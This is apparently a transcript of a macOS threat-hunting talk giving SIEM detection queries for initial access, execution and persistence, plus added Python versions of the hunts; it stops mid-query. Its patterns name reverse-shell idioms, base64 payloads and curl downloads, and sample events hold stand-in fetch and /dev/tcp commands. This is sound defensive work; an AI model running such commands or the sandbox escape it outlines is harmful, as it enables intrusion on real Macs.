Slide 1

Hunting for macOS attack techniques. Part 1 – Initial Access, Execution, Credential Access, Persistence
Teymur Kheirkhabarov, Director of Cyber Threat Monitoring, Response and Research Department, BI.ZONE
Maxim Tumakov, Head of Cyber Threat Research, BI.ZONE

Slide 2

dscl . -read "/Users/$(id -un)" RealName

Teymur Kheirkhabarov
• Director of Cyber Threat Monitoring, Response and Research Department at BI.ZONE (SOC, MDR, DFIR, TI, EDR, XDR, IRP, etc.)
• Threat Hunter
• ZeroNights / PHDays / OFFZONE speaker
• GIAC GXPN / GCFA / GDSA certified
• Ex-Head of SOC R&D at Kaspersky Lab / SOC Analyst / Infosec Admin / IT
• Twitter @HeirhabarovT
• Telegram @Heirhabarov

Maxim Tumakov
• Head of Cyber Threat Research at BI.ZONE
• Threat Hunter
• Ex-Digital Forensics & Incident Response expert (Informzaschita)
• Ex-Security Researcher (Kaspersky)
• OSCP / eCPTXv2 certified
• Telegram @mrtrumster

Slide 3

What are we going to talk about?

Slide 4

What did we use to prepare this talk?

Slide 5

macOS monitoring mechanisms

Slide 6

macOS monitoring tools

Slide 7

Red Canary Mac Monitor

Slide 8

Initial Access

Slide 9

Initial Access

Slide 10

Application
Application bundles are one of the most common types of bundle created by developers. The application bundle stores everything that the application requires for successful operation.
*.app in macOS ≈ C:\Program Files\ in Windows

Slide 11

Application. Malicious document
Document.pdf.app: the application disguised as a PDF document
Main.scpt: the AppleScript launching the second-stage payload
applet: the main binary of the application that runs the AppleScript

Slide 12

Application. Malicious document. Let’s hunt it!
Running a process with suspicious extensions:
    dev_os_type:macos AND event_type:ProcessCreate AND (
      cmdline.keyword:/.*\.(pdf|doc|docx|xls|xlsx|ppt|pptx)\.app.*/ OR
      proc_file_path.keyword:/.*\.(pdf|doc|docx|xls|xlsx|ppt|pptx)\.app.*/ OR
      proc_p_file_path.keyword:/.*\.(pdf|doc|docx|xls|xlsx|ppt|pptx)\.app.*/ OR
      proc_p_cmdline.keyword:/.*\.(pdf|doc|docx|xls|xlsx|ppt|pptx)\.app.*/
    )

Slide 13

Packages
A package is a directory that contains a hierarchy of files or objects that represent a preserved, organized state. A package is displayed to users as a single file in the Finder application to avoid being changed by the user.
*.pkg in macOS ≈ *.msi in Windows
GUI Installer: /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service
CLI Installer: /usr/sbin/installer

Slide 14

Packages. Pre/Post install scripts
Normally, pre/post install scripts are used for preparing and cleaning up software installations. The preinstall script runs before package installation and the postinstall script runs after it.

Slide 15

Packages. Pre/Post install scripts. Let’s hunt it!
Running a pre/post install script:
    dev_os_type:macos AND
    proc_p_file_path:"/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service" AND
    cmdline:("/preinstall" OR "/postinstall") AND
    proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl")
1. May be noisy; must be profiled for the specific infrastructure
2. Can be used for threat hunting

Slide 16

Packages. Pre/Post install scripts. Let’s hunt it!
Launching child processes of a pre/post install script:
    dev_os_type:macos AND
    proc_p_cmdline:("/tmp/" AND "/Scripts/" AND ("/preinstall" OR "/postinstall")) AND
    proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl")
1. More accurate, but must be profiled for the specific infrastructure too
2. Can be used for threat hunting
If the malicious command ends with the & sign, the parent process will be /sbin/launchd and the hunt does not work in this case.

Slide 17

Packages. Pre/Post install scripts. Let’s hunt it!
Starting a process from the installer's temporary directory:
    dev_os_type:macos AND
    proc_cwd.keyword:/.*\/private\/tmp\/PKInstallSandbox.*/ AND
    proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl")

Slide 18

Packages. Distribution.xml
Distribution XML file (embedded script)
Distribution XML file (external script)

Slide 19

Packages. Distribution.xml. Let’s hunt it!
Distribution XML file (embedded script):
    dev_os_type:macos AND
    proc_p_file_path:"/System/Library/CoreServices/Installer.app/Contents/MacOS/Installer" AND
    proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl")

Slide 20

Packages. Distribution.xml. Let’s hunt it!
Distribution XML file (external script):
    dev_os_type:macos AND
    proc_pp_file_path:"/System/Library/CoreServices/Installer.app/Contents/MacOS/Installer" AND
    proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl")

Slide 21

Packages. Installer Plugin
An Installer Plugin is a helper application that allows you to customize the installation panel of the main application.
Extra step added by Installer Plugin

Slide 22

Packages. Installer Plugin. Let’s hunt it!
A special process is used to launch an installer plugin:
    dev_os_type:macos AND
    proc_p_file_path.keyword:/\/System\/Library\/CoreServices\/Installer.app\/Contents\/XPCServices\/InstallerRemotePluginService-(x86_64|arm64).xpc\/Contents\/MacOS\/InstallerRemotePluginService-(x86_64|arm64)/ AND
    proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl")

Slide 23

DMG
An Apple disk image file's name usually has ".dmg" as its extension. A disk image is a compressed copy of the contents of a disk or folder.
*.dmg in macOS ≈ *.iso in Windows

Slide 24

DMG
When an application is launched from a DMG without installation, the application bundle is copied to a temporary directory (App Translocation). This hunt detects the launch of suspicious processes from such temporary directories:
    dev_os_type:macos AND event_type:ProcessCreate AND
    proc_p_cmdline:("/private/var/folders/" AND "/AppTranslocation/") AND
    proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl")

Slide 25

MS Office
VBA Macro in MS Word document
XLM Macro in MS Excel document

Slide 26

MS Office. Let’s hunt it!
    dev_os_type:macos AND
    proc_p_file_path:(
      "/Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel" OR
      "/Applications/Microsoft Word.app/Contents/MacOS/Microsoft Word" OR
      "/Applications/Microsoft PowerPoint.app/Contents/MacOS/Microsoft PowerPoint"
    ) AND
    -cmdline:("/Microsoft Error Reporting.app" OR "/Microsoft AutoUpdate.app")
VBA Macro
XLM Macro

Slide 27

MS Office. Sandbox escape
MS Office macros run in the sandbox, but there is a well-known escape method:
1. Upload a ~$.zip archive with .bash_profile or .zshenv to the target host
2. Create a Login Item for the victim user
3. After reboot, the Login Item unpacks the archive to the user's home directory
4. Now, every time bash/zsh is launched, the malicious payload runs outside the sandbox context
Apfell (Mythic payload)

Slide 28

MS Office. Sandbox escape. Let’s hunt it!
To escape from the sandbox, a suspicious macro must create one or more ~$.zip files. This hunt detects manipulations with such files:
    dev_os_type:macos AND event_type:(FileCreate OR FileDelete OR FileChange) AND
    proc_cwd.keyword:/.*\/Library\/Containers\/com\.microsoft\.(Word|Excel|Powerpoint)\/Data/ AND
    file_path.keyword:/.*\/\~\$.*/

Slide 29

Drive-by Compromise
Some browser exploits spawn child processes to perform various actions. Such a generic hunt with a low FP ratio can detect traces of exploitation of such vulnerabilities:
    dev_os_type:macos AND event_type:ProcessCreate AND
    proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl") AND
    proc_p_file_path:("/Applications/Safari.app/" OR "/Applications/Chrome.app/" OR "/Applications/Firefox.app/")
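The initial-access hunts of slides 12 to 29 re-expressed as Python predicates over process-creation events, so they can be tested offline. This is an added example, not code from the talk; the field names follow the slides' telemetry schema, the events are constructed, and the interpreter match is generalised slightly to accept a version suffix such as python3.

```python
import re

# Shells, interpreters and curl: the "suspicious child" set the talk reuses in every hunt.
# Generalised slightly: a version suffix such as python3 still matches.
INTERPRETER_RE = re.compile(r"/(sh|bash|dash|tclsh|ksh|tcsh|csh|python[0-9.]*|ruby|perl|php|osascript|curl)$")
DOC_APP_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.app", re.IGNORECASE)
PKG_SCRIPT_SERVICE = ("/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/"
                      "package_script_service.xpc/Contents/MacOS/package_script_service")
INSTALLER = "/System/Library/CoreServices/Installer.app/Contents/MacOS/Installer"
PLUGIN_SERVICE_RE = re.compile(
    r"/Installer\.app/Contents/XPCServices/InstallerRemotePluginService-(x86_64|arm64)\.xpc/"
    r"Contents/MacOS/InstallerRemotePluginService-(x86_64|arm64)$")
OFFICE = ("/Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel",
          "/Applications/Microsoft Word.app/Contents/MacOS/Microsoft Word",
          "/Applications/Microsoft PowerPoint.app/Contents/MacOS/Microsoft PowerPoint")
OFFICE_BENIGN = ("/Microsoft Error Reporting.app", "/Microsoft AutoUpdate.app")
BROWSERS = ("/Applications/Safari.app/", "/Applications/Chrome.app/", "/Applications/Firefox.app/")


def hunt_initial_access(ev):
    """Return the names of the slide hunts that one ProcessCreate event (a dict) matches."""
    child = ev.get("proc_file_path", "")
    parent = ev.get("proc_p_file_path", "")
    cmd = ev.get("cmdline", "")
    pcmd = ev.get("proc_p_cmdline", "")
    hits = []
    # Slide 12: a document extension followed by .app in any process or parent path/command line.
    if any(DOC_APP_RE.search(f) for f in (cmd, child, parent, pcmd)):
        hits.append("document_disguised_app")
    if INTERPRETER_RE.search(child):
        # Slide 15: pre/post install script launched by package_script_service.
        if parent == PKG_SCRIPT_SERVICE and ("/preinstall" in cmd or "/postinstall" in cmd):
            hits.append("pkg_pre_post_install_script")
        # Slide 16: child of such a script (the parent's command line points into /tmp/.../Scripts/).
        if "/tmp/" in pcmd and "/Scripts/" in pcmd and ("/preinstall" in pcmd or "/postinstall" in pcmd):
            hits.append("pkg_install_script_child")
        # Slide 17: process started from the installer's temporary directory.
        if "/private/tmp/PKInstallSandbox" in ev.get("proc_cwd", ""):
            hits.append("pkg_install_sandbox_cwd")
        # Slides 19/20: Distribution.xml script, embedded (parent) or external (grandparent).
        if parent == INSTALLER or ev.get("proc_pp_file_path", "") == INSTALLER:
            hits.append("distribution_xml_script")
        # Slide 22: installer plugin run by InstallerRemotePluginService.
        if PLUGIN_SERVICE_RE.search(parent):
            hits.append("installer_plugin")
        # Slide 24: an app launched straight from a DMG is translocated under /private/var/folders/.
        if "/private/var/folders/" in pcmd and "/AppTranslocation/" in pcmd:
            hits.append("dmg_app_translocation")
        # Slide 29: interpreter spawned by a browser.
        if parent.startswith(BROWSERS):
            hits.append("browser_child_process")
    # Slide 26: any child of Office except its own error-reporting and update helpers.
    if parent in OFFICE and not any(b in cmd for b in OFFICE_BENIGN):
        hits.append("office_child_process")
    return hits


# Constructed sample events (not real telemetry); field names follow the talk's schema.
SAMPLE_EVENTS = [
    {"proc_file_path": "/bin/sh", "proc_p_file_path": PKG_SCRIPT_SERVICE,
     "cmdline": "/bin/sh /tmp/PKInstallSandbox.abc123/Scripts/com.example.pkg.xyz/postinstall",
     "proc_cwd": "/private/tmp/PKInstallSandbox.abc123/Scripts/com.example.pkg.xyz"},
    {"proc_file_path": "/usr/bin/curl", "proc_p_file_path": "/bin/sh",
     "proc_p_cmdline": "/bin/sh /tmp/PKInstallSandbox.abc123/Scripts/com.example.pkg.xyz/postinstall",
     "cmdline": "curl -s https://example.invalid/second-stage"},
    {"proc_file_path": "/usr/bin/osascript",
     "proc_p_file_path": "/Users/alice/Downloads/Document.pdf.app/Contents/MacOS/applet",
     "proc_p_cmdline": "/Users/alice/Downloads/Document.pdf.app/Contents/MacOS/applet",
     "cmdline": "osascript /Users/alice/Downloads/Document.pdf.app/Contents/Resources/Scripts/main.scpt"},
    {"proc_file_path": "/bin/zsh", "proc_p_file_path": OFFICE[1], "cmdline": "/bin/zsh -c id"},
    {"proc_file_path": "/Applications/Microsoft AutoUpdate.app/Contents/MacOS/Microsoft AutoUpdate",
     "proc_p_file_path": OFFICE[1],
     "cmdline": "/Applications/Microsoft AutoUpdate.app/Contents/MacOS/Microsoft AutoUpdate"},
    {"proc_file_path": "/usr/bin/python3", "proc_p_file_path": "/Applications/Safari.app/Contents/MacOS/Safari",
     "cmdline": "python3 -c pass"},
]


def run_hunts(events=SAMPLE_EVENTS):
    """Map each event index to the hunts it triggers; events with no hits are omitted."""
    return {i: hits for i, ev in enumerate(events) if (hits := hunt_initial_access(ev))}


if __name__ == "__main__":
    for i, hits in run_hunts().items():
        print(i, hits)
```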

Slide 30

Execution

Slide 31

Execution

Slide 32

Execution. Open Scripting Architecture (OSA)
The Open Scripting Architecture (OSA) provides a standard and extensible mechanism for interapplication communication in OS X. This communication takes place through the exchange of Apple events. An Apple event is a type of interprocess message that encapsulates commands and data.
Supported languages:
• AppleScript
• JavaScript for Automation (JXA)
Launch methods:
| Launch method | Description |
| osascript -e "script here" | Running a one-line command |
| osascript /path/to/script | Running a script from a file |
| #!/usr/bin/osascript | Running a file with a specific header (shebang) |
| osacompile -> Mach-O | Script compilation |
| NSAppleScript, OSAScript | Launch via native macOS API |
| NSCreateObjectFileImageFromMemory | Reflective code loading |
| applescript://com.apple.scripteditor?action=new&script= | Open URL |
OSA scripts in macOS ≈ PowerShell in Windows

Slide 33

Execution. Open Scripting Architecture (OSA)
AppleScript compilation:
    osacompile -o compiled.app apple_script.scpt
AppleScript run-only compilation:
    osacompile -x -o compiled.app apple_run_only_script.scpt
Directory structure of the compiled script-application
Directory structure of the compiled run-only script-application

Slide 34

Execution. Open Scripting Architecture (OSA). Let’s hunt it!
Running a script from a file:
    dev_os_type:macos AND event_type:ProcessCreate AND cmdline.keyword:/.*osascript .*\.(js|scpt).*/

Slide 35

Execution. Open Scripting Architecture (OSA). Let’s hunt it!
Running suspicious commands:
    dev_os_type:macos AND event_type:ProcessCreate AND cmdline.keyword:/.*osascript .*-e.*return.*(system info|the clipboard|set popup).*/

Slide 36

Execution. Open Scripting Architecture (OSA). Let’s hunt it!
Compiling a script via a command line utility:
    dev_os_type:macos AND event_type:ProcessCreate AND cmdline.keyword:*osacompile*

Slide 37

Execution. Open Scripting Architecture (OSA). Let’s hunt it!
Downloading a file using Objective-C:
    dev_os_type:macos AND event_type:ProcessCreate AND cmdline:(*dataWithContentsOfURL* OR *URLWithString*)

Slide 38

Execution. Shell
By default, at least 7 (?) different command shells are installed on macOS. Attackers can use shells:
• to execute shell built-in commands
• to launch system utilities
• to initialize a reverse shell
• etc.

Slide 39

Execution. Shells. Let’s hunt it!
Attackers can use any command shell to get a reverse shell on a remote host:
    dev_os_type:macos AND event_type:ProcessCreate AND
    cmdline.keyword:( /.*\/dev\/tcp\/.*/ OR /.*\/dev\/udp\/.*/ OR /.*zsh\/net\/tcp\/.*/ OR /.*zsh\/net\/udp\/.*/ )

Slide 40

Execution. Shells. Let’s hunt it!
Just like on Windows and Linux, on macOS attackers actively use Base64 to encode the payload:
    dev_os_type:macos AND event_type:ProcessCreate AND cmdline:(*base64* OR *b64decode* OR (*openssl* AND *enc* AND *-base64*))

Slide 41

Execution. Shells. Let’s hunt it!
To run processes in the background, attackers use the nohup utility, which is rarely used by legitimate applications on macOS:
    dev_os_type:macos AND event_type:ProcessCreate AND ( proc_file_path:"/usr/bin/nohup" OR cmdline:*nohup* )

Slide 42

Execution. Binary
Mach-O, short for Mach object file format, is a file format for executables, object code, shared libraries, dynamically loaded code, and core dumps.
Malicious applications often save the payload to the root of temporary directories, whereas legitimate applications almost never do so:
    dev_os_type:macos AND event_type:ProcessCreate AND
    proc_file_path.keyword:( /\/tmp\/[^\/]*/ OR /\/private\/tmp\/[^\/]*/ OR /\/var\/tmp\/[^\/]*/ OR /\/private\/var\/tmp\/[^\/]*/ )
Symbolic links for temporary macOS directories:
• /tmp -> /private/tmp
• /var -> /private/var

Slide 43

Execution. Binary. Let’s hunt it!
To launch a malicious file, the attacker needs to add execution rights. This hunt detects the use of the chmod/chown utilities in the root of temporary directories:
    dev_os_type:macos AND (
      (
        cmdline:(*chown* OR *chmod*) AND
        cmdline.keyword:( /.* \/private\/tmp\/[^\/]*/ OR /.* \/tmp\/[^\/]*/ OR /.* \/private\/var\/tmp\/[^\/]*/ OR /.* \/var\/tmp\/[^\/]*/ )
      ) OR (
        proc_file_path:("/bin/chmod" OR "/bin/chown") AND
        proc_cwd.keyword:( /\/private\/tmp/ OR /\/tmp/ OR /\/private\/var\/tmp/ OR /\/var\/tmp/ )
      )
    )

Slide 44

Execution. Interpreters
This precise hunt identifies specific command lines used to run a reverse shell from an interpreter:
    dev_os_type:macos AND event_type:ProcessCreate AND
    cmdline:(
      (*SOCK_STREAM* AND *connect* AND *exec*) OR
      (*INET* AND *PeerAddr* AND *fdopen*) OR
      (*socket* AND *TCPSocket* AND (*exec* OR *popen*)) OR
      (*fsockopen* AND (*exec* OR *shell_exec* OR *system* OR *passthru* OR *popen*))
    )

Slide 45

Execution. Interpreters
This generic hunt identifies suspicious activity of interpreters (a shell spawned by an interpreter):
    dev_os_type:macos AND event_type:ProcessCreate AND
    proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh") AND
    proc_p_file_path:("/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript")

Slide 46

Execution
osascript and curl combined in one command line:
    dev_os_type:macos AND event_type:ProcessCreate AND cmdline:(*osascript* AND *curl*)
curl downloading a file into a temporary directory:
    dev_os_type:macos AND event_type:ProcessCreate AND cmdline.keyword:/.*curl .* -o .*(\/tmp\/|\/private\/tmp\/|\/private\/var\/tmp\/).*/
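The execution hunts of slides 34 to 46 (OSA, shells, temporary-directory binaries, interpreters) transcribed into Python so they can be run against sample events. This is an added example, not code from the talk; the Lucene wildcards and regexes are translated into substring and re checks, and the events are constructed.

```python
import re

# Regexes transcribed from the slide 34-46 hunts; the talk's Lucene wildcards become substring checks.
OSA_FILE_RE = re.compile(r"osascript .*\.(js|scpt)")                                        # slide 34
OSA_SUSPICIOUS_RE = re.compile(r"osascript .*-e.*return.*(system info|the clipboard|set popup)")  # slide 35
REVERSE_SHELL_RE = re.compile(r"/dev/(tcp|udp)/|zsh/net/(tcp|udp)/")                        # slide 39
TMP_ROOT_RE = re.compile(r"^/(private/)?(var/)?tmp/[^/]+$")     # slide 42: file directly in a tmp root
TMP_ARG_RE = re.compile(r" /(private/)?(var/)?tmp/[^/]+")       # slide 43: chmod/chown argument in a tmp root
TMP_CWD_RE = re.compile(r"^/(private/)?(var/)?tmp")             # slide 43: chmod/chown run from a tmp root
CURL_TO_TMP_RE = re.compile(r"curl .* -o .*(/tmp/|/private/tmp/|/private/var/tmp/)")       # slide 46
SHELLS = ("/sh", "/bash", "/dash", "/tclsh", "/ksh", "/tcsh", "/csh")
INTERPRETERS = ("/python", "/ruby", "/perl", "/php", "/osascript")


def has_all(text, *words):
    return all(w in text for w in words)


def hunt_execution(ev):
    """Return the names of the slide 34-46 hunts that one ProcessCreate event (a dict) matches."""
    cmd = ev.get("cmdline", "")
    path = ev.get("proc_file_path", "")
    parent = ev.get("proc_p_file_path", "")
    cwd = ev.get("proc_cwd", "")
    hits = []
    if OSA_FILE_RE.search(cmd):
        hits.append("osascript_script_file")
    if OSA_SUSPICIOUS_RE.search(cmd):
        hits.append("osascript_suspicious_command")
    if "osacompile" in cmd:                                            # slide 36
        hits.append("osacompile")
    if "dataWithContentsOfURL" in cmd or "URLWithString" in cmd:       # slide 37
        hits.append("objc_download")
    if REVERSE_SHELL_RE.search(cmd):
        hits.append("shell_reverse_shell")
    if "base64" in cmd or "b64decode" in cmd or has_all(cmd, "openssl", "enc", "-base64"):  # slide 40
        hits.append("base64_payload")
    if path == "/usr/bin/nohup" or "nohup" in cmd:                     # slide 41
        hits.append("nohup")
    if TMP_ROOT_RE.match(path):
        hits.append("binary_in_tmp_root")
    if ((("chmod" in cmd or "chown" in cmd) and TMP_ARG_RE.search(cmd))
            or (path in ("/bin/chmod", "/bin/chown") and TMP_CWD_RE.match(cwd))):
        hits.append("chmod_chown_in_tmp")
    # Slide 44: socket-plus-exec idioms of Python, Perl, Ruby and PHP reverse shells.
    if (has_all(cmd, "SOCK_STREAM", "connect", "exec")
            or has_all(cmd, "INET", "PeerAddr", "fdopen")
            or (has_all(cmd, "socket", "TCPSocket") and ("exec" in cmd or "popen" in cmd))
            or ("fsockopen" in cmd and any(w in cmd for w in ("exec", "shell_exec", "system", "passthru", "popen")))):
        hits.append("interpreter_reverse_shell")
    if path.endswith(SHELLS) and parent.endswith(INTERPRETERS):        # slide 45
        hits.append("shell_spawned_by_interpreter")
    if has_all(cmd, "osascript", "curl"):                              # slide 46
        hits.append("osascript_with_curl")
    if CURL_TO_TMP_RE.search(cmd):
        hits.append("curl_download_to_tmp")
    return hits


# Constructed sample events (not real telemetry); the reverse-shell command line is elided on purpose.
SAMPLE_EVENTS = [
    {"proc_file_path": "/bin/bash", "proc_p_file_path": "/usr/bin/osascript",
     "cmdline": "bash -c '... /dev/tcp/203.0.113.10/4444 ...'"},
    {"proc_file_path": "/private/tmp/update", "proc_p_file_path": "/bin/sh", "cmdline": "/private/tmp/update"},
    {"proc_file_path": "/bin/chmod", "proc_p_file_path": "/bin/sh", "cmdline": "chmod +x /tmp/update",
     "proc_cwd": "/Users/alice"},
    {"proc_file_path": "/usr/bin/curl", "proc_p_file_path": "/bin/sh",
     "cmdline": "curl -s https://example.invalid/u -o /private/tmp/.u"},
    {"proc_file_path": "/usr/bin/osascript", "proc_p_file_path": "/bin/zsh",
     "cmdline": "osascript -e 'return system info'"},
    {"proc_file_path": "/usr/bin/git", "proc_p_file_path": "/bin/zsh", "cmdline": "git status",
     "proc_cwd": "/Users/alice/project"},
]


def run_hunts(events=SAMPLE_EVENTS):
    """Map each event index to the hunts it triggers; events with no hits are omitted."""
    return {i: hits for i, ev in enumerate(events) if (hits := hunt_execution(ev))}


if __name__ == "__main__":
    for i, hits in run_hunts().items():
        print(i, hits)
```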

Slide 47

Persistence

Slide 48

macOS Persistence

Slide 49

macOS persistence management – what’s new in Ventura
• With Ventura comes the new login and background item management feature
• This new feature helps users see what is running in the background of their Mac: the invisible becomes visible
• So, now users can see which apps are set up for persistence without having to search directories in the Finder, use the Terminal, or rely on 3rd party software
• Users can now manage Login Items, Launch Agents and Launch Daemons all from a single place in System Settings
• Also, when a new Launch Agent, Launch Daemon or Login Item is added, the system now generates a notification alert
Login items
Launch Agents / Daemons

Slide 50

macOS persistence management – 3rd party tools
BlockBlock monitors common persistence locations and alerts whenever a persistent component is added.
KnockKnock performs an inventory of common persistence locations and uncovers persistently installed software.

Slide 51

T1543.004 – Create or Modify System Process: Launch Daemon
• Launch Daemons are background processes that run with root privileges and execute when the system is started
• Launch Daemons use property list files defined in:
  • /System/Library/LaunchDaemons/*.plist (SIP protected)
  • /Library/Apple/System/Library/LaunchDaemons/*.plist (SIP protected)
  • /Library/LaunchDaemons/*.plist (only root has access)
T1543.001 – Create or Modify System Process: Launch Agent
• Launch Agents are per-user background processes that only execute while the user is logged in
• Launch Agents are defined in property list files that are in:
  • /System/Library/LaunchAgents/*.plist (SIP protected)
  • /Library/Apple/System/Library/LaunchAgents/*.plist (SIP protected)
  • /Library/LaunchAgents/*.plist (only root has access)
  • /Users/$username/Library/LaunchAgents/*.plist ($username has access)

Slide 52

Property List Files (PLIST)
• Can be anywhere on a macOS system
• Three formats: XML, JSON (Dictionary) or binary blobs
• Used to store configuration settings, permissions, preferences, etc.
• Usually named in reverse DNS notation (com.apple.thing)
• From an offensive perspective, they come into play for:
  • Persistence (Launch Agents/Launch Daemons)
  • Evasion (Entitlements, Application’s Info.plist)
  • Situational Awareness (/Library/Receipts/InstallHistory.plist)
• Launch Agent / Launch Daemon plists must conform to the launchd format. Important keys:
  • Label: a unique string that identifies the agent
  • ProgramArguments: the arguments used to launch the agent
  • RunAtLoad: start the agent when the property list file is loaded by launchd

Slide 53

Hunting for suspicious Launch Agents/Daemons

Slide 54

Hunting for suspicious Launch Agents/Daemons
What telemetry do we need?
• Process Creation monitoring
• Process Inventory
• Console Commands monitoring
• Console Commands History
• File Creation monitoring
• File Change monitoring
• File Inventory
• Launch Agents/Launch Daemons inventory
• Launch Items inventory

Slide 55

Downloading Launch Agent/Daemon PLIST by console tool
It is quite common for malware or adversaries to download Launch Agent/Daemon PLIST files using standard tools like curl.
OSX.CreativeUpdate:
OSX.Siggen:
Some macOS malware that combines the EmPyre backdoor and the XMRig miner:

Slide 56

Downloading Launch Agent/Daemon PLIST by console tool. Let’s hunt it!
Search for command lines that contain combinations of standard downloading tools (like curl) and paths to the Launch Agents/Daemons PLIST files location:
    dev_os_type:macos AND cmdline:*curl* AND
    (cmdline:("*/LaunchAgents/*" OR "*/LaunchDaemons/*") OR cmdline.keyword:*.plist*) AND
    -cmdline:("*/homebrew/Library/Homebrew/*")

Slide 57

Downloading Launch Agent/Daemon PLIST by console tool. Let’s hunt it!
Search for PLIST file creation or modification by curl or script interpreters:
    dev_os_type:macos AND event_type:(FileCreate OR FileChange) AND
    proc_file_path:(*curl* OR *osascript* OR *python* OR *perl* OR *ruby*) AND
    (file_path.keyword:*.plist OR file_path:("*/LaunchAgents/*" OR "*/LaunchDaemons/*")) AND
    -proc_cmdline:("*/homebrew/Library/Homebrew/*")

Slide 58

Building Launch Agent/Daemon PLIST from the command line
Silver Sparrow and UpdateAgent malware use PlistBuddy in direct mode to add arguments to a PLIST file:
VPN Trojan (Covid) malware creates the PLIST file using the echo command:

Slide 59

Building Launch Agent/Daemon PLIST from the command line. Let’s hunt it!
Search for usage of PlistBuddy or echo to create/modify a PLIST:
    cmdline:("echo *" OR *PlistBuddy*) AND cmdline:(*RunAtLoad* OR *ProgramArguments*) AND
    -(
      proc_cwd:"*/Library/InstallerSandboxes/.PKInstallSandboxManager/*" OR
      proc_cwd.keyword:/.+\/tmp\/PKInstallSandbox\.[0-9A-Za-z]+\/Scripts\/.+/ OR
      proc_p_cmdline:"*/Library/InstallerSandboxes/.PKInstallSandboxManager/*" OR
      proc_p_cmdline.keyword:/.+\/tmp\/PKInstallSandbox\.[0-9A-Za-z]+\/Scripts\/.+/
    )

Slide 60

Decode the content of PLIST from base64
Another trick commonly used by malware is to decode the content of the PLIST file from a base64 encoded string. Below is an example from the macOS.GMERA malware:

Slide 61

Decode the content of PLIST from base64. Let’s hunt it!
Search for command lines that contain combinations of the base64 substring and paths to the Launch Agents/Daemons PLIST files location:
    dev_os_type:macos AND cmdline:(*base64*) AND
    (cmdline:("*/LaunchAgents/*" OR "*/LaunchDaemons/*") OR cmdline.keyword:*.plist*)

Slide 62

Other ways to create malicious Launch Agent/Daemon PLIST files: mv, cp, touch, zip commands
• Calisto malware adds a property list file to LaunchAgents using ‘cp’:
• Dummy malware adds a property list file to LaunchDaemons using ‘mv’:
• HiddenLotus uses ‘touch’ to create a property list file in LaunchDaemons

Slide 63

Suspicious Launch Agent/Daemon PLIST files
Adversaries may attempt to manipulate the name of the PLIST file to make it appear legitimate or benign.
Masquerading as a system service (PLIST file name contains "com.apple.*"):
• ~/Library/LaunchAgents/com.apple.spx.plist
• ~/Library/LaunchDaemons/com.apple.acc.installer.v1.plist
• ~/Library/LaunchAgents/com.apple.softwareupdate.plist
• ~/Library/LaunchAgents/com.apple.HYQ.plist
• ~/Library/LaunchAgents/com.apple.2KR.plist
• ~/Library/LaunchAgents/com.apple.Yahoo.plist
• ~/Library/LaunchAgents/com.apple.Google.plist
• /Library/LaunchAgents/com.apple.update.plist
• ~/Library/LaunchAgents/com.apple.abtpd.plist
• /Library/LaunchDaemons/com.apple.abtpd.plist
• ~/Library/LaunchAgents/com.apple.Safari.proxy.plist
• ~/Library/LaunchAgents/com.apple.Safari.pac.plist
• /Library/LaunchDaemons/com.apple.marcoagent.voiceinstallerd.plist
• ~/Library/LaunchAgents/com.apple.marcoagent.voiceinstaller.plist
• ~/Library/LaunchAgents/com.apple.appstore.checkupdate.plist
• ~/Library/LaunchAgents/com.apple.usagestatistics.plist
• ~/Library/LaunchAgents/com.apple.iCloud.sync.daemon.plist
Hidden PLIST file (name starts with a dot):
• /Library/LaunchDaemons/.com.apple.WindowServer.plist
• /Library/LaunchAgents/.com.apple.upd.plist
• ~/Library/LaunchAgents/.com.apple.system.plist
PLIST file name looks similar to "com.apple":
• ~/Library/LaunchAgents/com.appIe.stockf.stocks
• ~/Library/LaunchAgents/com.appIe.stockfolioses.Stockfoli
Masquerading as a macOS update service:
• ~/Library/LaunchAgents/com.uptodatemac.upd.agent.plist
• ~/Library/LaunchAgents/MacOSupdate.plist
• ~/Library/mdworker/MacOSupdate.plist
Too short PLIST file name:
• ~/Library/k.plist
• ~/Library/LaunchAgents/a.plist
• ~/Library/LaunchAgents/1.plist

Slide 64

Suspicious Launch Agent/Daemon PLIST files. Let’s hunt it!
Search for PLIST files that look like legitimate system services but are not located in the folders typical for system Launch Agents/Daemons:
    dev_os_type:macos AND event_type:(FileCreate OR FileInfo) AND
    file_path:("*/Library/LaunchAgents/*" OR "*/Library/LaunchDaemons/*") AND
